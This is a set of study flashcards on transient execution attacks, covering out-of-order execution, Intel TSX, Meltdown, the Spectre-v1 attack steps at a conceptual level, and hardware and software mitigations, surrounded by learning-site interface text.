17: Transient execution attacks

0.0(0)
Studied by 0 people
call kaiCall Kai
learnLearn
examPractice Test
spaced repetitionSpaced Repetition
heart puzzleMatch
flashcardsFlashcards
GameKnowt Play
Card Sorting

1/17

encourage image

There's no tags or description

Looks like no tags are added yet.

Last updated 9:28 AM on 4/30/26
Name
Mastery
Learn
Test
Matching
Spaced
Call with Kai

No analytics yet

Send a link to your students to track their progress

18 Terms

1
New cards

Out of order execution

  • Key performance optimisation next to speculative execution

  • Hides/minimises latency (eg cache misses, FPU operations)

  • Keeps elements in execution pipeline busy

  • Leaves data in cache(!)

2
New cards

What does out of order execution exploit?

  • In microarchitecture. instructions can be reordered

  • Usually no issue when there are no data dependencies

  • Results are only committed (architecturally) once all operations are completed

3
New cards

Common techniques for suppressing faults

  • Custom segfault handlers

  • Intel’s Transactional Synchronisation Extensions (TSX)

4
New cards

Meltdown

  • Need to architecturally suppress faults

5
New cards

Intel’s Transactional Synchronization Extensions (TSX)

  • ISA extension for hardware transactional memory

  • Allow parallelism via lock elision

  • Data accesses are bundled in transactions

  • If transaction fails:

    • Re-roll and try again (HLE)

    • Jmp to custom handler (RTM)

  • Now disabled for desktop CPUs, still available one some Xeon CPUs

6
New cards

Spectre

  • Abuses branch (mis)prediction and speculative execution

    • Access sensitive data transiently

    • Cache side-channel to exfiltrate data

  • Full class of attacks

    • New variants are still discovered

    • Previously thought mitigated issues turn out to still be exploitable

    • Still an active research topic

7
New cards

Spectre-v1 (Spectre-PHT) attack steps

  • Train direct branch predictor to take branch

  • Execute target with x out of bounds

    • This will transiently access the value at array1[x]

  • Exfiltrate secret via cache side channel by probing array2

    • eg via flush + reload

8
New cards

Spectre impact

  • Almost every CPU before 2018 vulnerable

    • Software and microcode mitigations

    • Partially high performance impact

9
New cards

Newer CPUs

Have hardware mitigations against some variants of Spectre

10
New cards

Meltdown is fully mitigated in

Hardware

11
New cards

Spectre hotfixes and workarounds

  • Intermediate solution found after vulnerabilities

  • Implemented by:

    • Removing particular gadgets used during attacks

    • Changes to software

    • Microcode updates to disable features or change instruction behaviour

12
New cards

Spectre hotfix advantages

Fast mitigation of specific attack vector

13
New cards

Spectre hotfix disadvantages

Performance overhead and may not fully mitigate attacks

14
New cards

Hardware defenses

  • Take time to develop - CPU design-release cycle takes multiple years

  • Sometimes allow to fully remove vulnerability

  • May not be complete (for performance reasons)

15
New cards

Systematic defenses

  • Less used in practice

  • High performance overhead

  • Major software changes needed

16
New cards

Transient execution

  • Changes microarchitectural state

  • Even if results are not used architecturally, it leaves traces in the microarchitecture

  • Attackers can use this to leak information across privilege domains via side channels

17
New cards

Spectre type

Speculation based

18
New cards

Meltdown type

Exception based